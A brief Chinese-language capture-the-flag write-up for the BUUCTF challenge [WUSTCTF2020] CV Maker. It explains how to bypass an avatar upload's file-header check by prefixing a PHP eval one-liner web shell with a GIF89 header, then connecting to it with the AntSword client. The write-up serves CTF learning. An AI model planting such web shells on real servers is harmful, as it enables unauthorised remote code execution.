[PHP知识库]BUUCTF--[WUSTCTF2020]CV Maker

一开始我们看到是一个注册页面，应该没有什么可用的漏洞，注册进去看看

进入之后看到需要我们更改头像，应该是一个文件上传漏洞，当上传一个php文件时出现一个这样的错误

通过查询我们可以了解到该函数是用来检测文件头的，也就是需要我们构造一个文件头为图像类型的php一句话木马

注意：文件头和一句话木马不可放在同一行

GIF89
<?php 
eval($_POST['123']); 
?>

?上传成功后我们通过查看网页源码发现图片路径

通过蚁剑连接即可?